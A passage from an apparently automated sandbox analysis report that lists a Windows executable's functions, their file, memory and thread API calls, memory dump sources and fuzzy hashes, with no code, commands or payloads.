                                                                                                                                                                                                                                                  • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3498533004-0
                                                                                                                                                                                                                                                • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                                                                                                                                                                                                • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                                                                                                                                                                                                                                                Function 0040DB97 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                                                • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                                                                                                                                                                                                • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                                                                                                                                                                                                                                                Function 0040653F Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _beginthreadex.MSVCRT ref: 00406552
                                                                                                                                                                                                                                                  • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast_beginthreadex
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4034172046-0
                                                                                                                                                                                                                                                • Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                                                                                                                                                                                                                • Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
                                                                                                                                                                                                                                                Function 0040CC59 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: H_prolog
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3519838083-0
                                                                                                                                                                                                                                                • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                                                                                                                                                                                                • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                                                                                                                                                                                                                                                Function 0040DADC Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                                                                                                                                                                                                • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                                                                                                                                                                                                                                Function 0040DB6A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileTime
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1425588814-0
                                                                                                                                                                                                                                                • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                                                                                                                                                                                                • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                                                                                                                                                                                                                                Function 0040D89F Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000060,?,?,00000000,?,0040D96E,00000000,?,00000000,00000000,000000FF,?,00000001,?,?,?), ref: 0040D91A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                                                                                                • Opcode ID: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
                                                                                                                                                                                                                                                • Instruction ID: 1ceb60bf2594cd826c4dcd58ac8a3e75a9726935558582f6c117c88f0dd7e0c4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A219372A042858FCF30FF91D98096B77A5AF50358320853FE093732C1DA38AD49D75A
                                                                                                                                                                                                                                                Function 0040F42D Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                                • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                                                                                                                                                                                                • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                                                                                                                                                                                                                                Function 00402F6C Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                                                                                                • Opcode ID: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
                                                                                                                                                                                                                                                • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                                                                                                                                                                                                                                Function 0040D985 Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                                                                                                                                                                                • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                                                                                                                                                                                                                                Function 004024C4 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                                                                                                                                                                                • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                                                                                                                                                                                                                                Function 00401B1F Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                                                                                                                • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                                                                                                                                                                                • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                                                                                                                                                                                                                                Function 0040F3FC Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                                • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                                                                                                                                                                                                • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash:

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 004034C1 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _wtol.MSVCRT ref: 004034E5
                                                                                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                                                                                                                                                                                                                                • _wtol.MSVCRT ref: 0040367F
                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
